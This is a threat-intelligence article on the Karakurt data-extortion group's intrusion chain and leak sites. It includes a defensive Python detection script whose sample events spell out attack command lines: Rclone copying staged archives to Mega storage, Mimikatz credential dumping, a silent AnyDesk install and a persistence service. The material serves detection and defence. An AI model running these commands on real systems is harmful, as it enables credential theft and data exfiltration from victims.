Karakurt

Karakurt is a newly established cybercrime group that in just a couple of months has managed to hit over 40 victims. Unlike most financially motivated threat groups, Karakurt does not encrypt its victims' data with ransomware. Instead, its operations focus on exfiltrating sensitive data from the breached systems and then extorting the victims by threatening to publish the stolen information.

Another distinctive characteristic of Karakurt is that the group has deviated from the typical approach of targeting large corporations or critical infrastructure providers. Instead, it favors a faster tempo, compromising smaller companies or corporate subsidiaries, which allows it to move on to the next victim quickly. So far, the majority of the compromised organizations have been in North America, with Europe a distant second.

Adaptive Threatening Tactics

The Karakurt operators have also shown the ability to adopt new techniques rapidly and to swap out the tooling they use. According to the infosec researchers at Accenture Security who have been monitoring the group's activities, Karakurt uses legitimate VPN credentials as its initial access vector. So far, however, it has not been determined how the attackers obtain these credentials.

Once inside the network, the cybercriminals establish persistence, attempt to move laterally, and rely on tools or features already present in the targeted environment, an approach known as 'living off the land.' For persistence, Karakurt has been observed using several different methods. Initially, these included service creation, deploying remote-management tools, and spreading backdoors such as Cobalt Strike beacons across the victim's systems. More recent Karakurt operations have dropped Cobalt Strike and instead maintain access through the victim's VPN IP pool and AnyDesk, a legitimate remote desktop application. If the credentials they hold do not already grant elevated privileges, the attackers attempt to escalate by deploying Mimikatz or by using PowerShell.

Data Theft

The final step in the attack is the exfiltration of the victim's data. The chosen files are first compressed with either 7zip or WinZip. Rclone or FileZilla (SFTP) is then used for staging and for the final transfer of the data to Mega.io cloud storage. According to the researchers, two directories used for staging during the exfiltration phase were C:\Perflogs and C:\Recovery.
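As an added illustration (not code from the article or from Accenture's report), the script below turns the chain described in the two sections above, persistence via service creation and AnyDesk, credential dumping with Mimikatz, archiving into C:\Perflogs or C:\Recovery, and Rclone/FileZilla transfer to Mega.io, into detection rules run over constructed Sysmon-style process-creation events. The event format, host names, file paths and rule names are assumptions made for this example. 7-Zip, AnyDesk and Rclone are all legitimate tools, so in a real environment these rules would need allow-listing and correlation rather than being treated as standalone alerts; the last function shows the kind of correlation that matters, an archive landing in a staging directory and an exfiltration tool running on the same host.

```python
import json

# Indicators below are taken from the article's description of the chain; the
# event format and the sample events are constructed for this example.
STAGING_DIRS = ("c:\\perflogs", "c:\\recovery")          # staging paths named in the article
ARCHIVERS = ("7z.exe", "7za.exe", "7zg.exe", "winzip64.exe", "wzzip.exe")
EXFIL_TOOLS = ("rclone.exe", "filezilla.exe")

# Constructed, Sysmon-style process-creation events (one JSON object per line).
SAMPLE_EVENTS = r"""
{"host":"fs01","image":"C:\\Windows\\System32\\svchost.exe","cmd":"svchost.exe -k netsvcs","parent":"services.exe"}
{"host":"fs01","image":"C:\\Users\\svc_backup\\AppData\\Local\\Temp\\7z.exe","cmd":"7z.exe a -mx1 C:\\PerfLogs\\fin.7z \\\\fs01\\finance","parent":"cmd.exe"}
{"host":"fs01","image":"C:\\Users\\svc_backup\\rclone.exe","cmd":"rclone.exe copy C:\\PerfLogs\\fin.7z mega:backup --transfers 8","parent":"cmd.exe"}
{"host":"dc01","image":"C:\\Windows\\Temp\\AnyDesk.exe","cmd":"AnyDesk.exe --install C:\\ProgramData\\AnyDesk --start-with-win --silent","parent":"cmd.exe"}
{"host":"dc01","image":"C:\\Windows\\System32\\sc.exe","cmd":"sc create updsvc binPath= C:\\Recovery\\upd.exe start= auto","parent":"cmd.exe"}
{"host":"dc01","image":"C:\\Users\\admin\\Downloads\\mimikatz.exe","cmd":"mimikatz.exe \"privilege::debug\" \"sekurlsa::logonpasswords\" exit","parent":"cmd.exe"}
{"host":"ws07","image":"C:\\Program Files\\7-Zip\\7z.exe","cmd":"7z.exe a C:\\Users\\bob\\Documents\\photos.7z C:\\Users\\bob\\Pictures","parent":"explorer.exe"}
"""


def _basename(path):
    """Last path component of a Windows path (input is already lowercased)."""
    return path.rsplit("\\", 1)[-1]


def _in_staging_dir(cmd):
    return any(d in cmd for d in STAGING_DIRS)


# Each rule maps one step of the chain described in the article to a predicate
# over a lowercased event. The rule names are this example's own labels.
RULES = [
    ("staging_archive",     lambda e: _basename(e["image"]) in ARCHIVERS and _in_staging_dir(e["cmd"])),
    ("exfil_tool",          lambda e: _basename(e["image"]) in EXFIL_TOOLS
                                      and ("mega" in e["cmd"] or "sftp" in e["cmd"] or _in_staging_dir(e["cmd"]))),
    ("remote_tool_install", lambda e: _basename(e["image"]) == "anydesk.exe" and "--install" in e["cmd"]),
    ("service_creation",    lambda e: _basename(e["image"]) == "sc.exe" and " create " in e["cmd"]),
    ("credential_dumping",  lambda e: "mimikatz" in _basename(e["image"]) or "sekurlsa::" in e["cmd"]),
]


def parse_events(jsonl):
    """Yield events with path fields lowercased so rules compare case-insensitively."""
    for line in jsonl.splitlines():
        line = line.strip()
        if not line:
            continue
        ev = json.loads(line)
        yield {"host": ev["host"], "image": ev["image"].lower(),
               "cmd": ev["cmd"].lower(), "parent": ev.get("parent", "").lower()}


def triage(jsonl):
    """Return one finding per (event, matching rule), in event order."""
    findings = []
    for ev in parse_events(jsonl):
        for name, hit in RULES:
            if hit(ev):
                findings.append({"host": ev["host"], "rule": name, "cmd": ev["cmd"]})
    return findings


def hosts_with_exfil_chain(findings):
    """Hosts where an archive landed in a staging dir AND an exfil tool ran.
    Each tool alone is common on a Windows estate; both on the same host is
    the exfiltration step the article describes."""
    rules_by_host = {}
    for f in findings:
        rules_by_host.setdefault(f["host"], set()).add(f["rule"])
    return {h for h, r in rules_by_host.items() if {"staging_archive", "exfil_tool"} <= r}


if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for f in found:
        print(f"{f['host']:5} {f['rule']:20} {f['cmd']}")
    print("staging+exfil chain on:", sorted(hosts_with_exfil_chain(found)))
```

Run as-is, the script flags five events and reports fs01 as the only host showing the full staging-plus-transfer pattern; the ordinary 7-Zip use on ws07 is not flagged because it never touches a staging directory. To point this at real telemetry, replace SAMPLE_EVENTS with exported Sysmon Event ID 1 records mapped to the same three fields.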

The group set up two data-leak sites as early as June 2021, months before its first extortion operations. The two sites identified by infosec researchers are karakurt.group and karakurt.tech. The group also has a Twitter account that was created in August.
